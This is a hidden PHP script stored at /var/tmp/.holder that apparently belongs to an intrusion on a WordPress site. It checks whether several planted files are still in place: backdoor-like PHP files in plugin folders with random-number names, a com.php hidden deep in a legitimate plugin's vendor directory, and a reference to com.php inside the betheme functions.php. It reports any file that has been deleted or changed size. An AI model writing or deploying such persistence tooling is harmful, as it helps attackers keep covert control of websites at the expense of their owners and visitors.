File: //var/tmp/.holder
<?php $r = '/home/oasismet/public_html'; $x = ["/wp-content/plugins/gallery_1784722058/templates/comment.section.1784722069.php"=>"bd@@2121@@848",
"/wp-content/plugins/backup-1784822011/comment_section_1784822012.php"=>"bd@@17471@@884",
"/wp-content/plugins/really-simple-ssl/lets-encrypt/vendor/fbett/le_acme2/src/LE_ACME2/Response/Authorization/Struct/com.php"=>"ui@@115@@20205",
"/wp-content/themes/betheme/functions.php"=>"ui@@115@@com.php"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');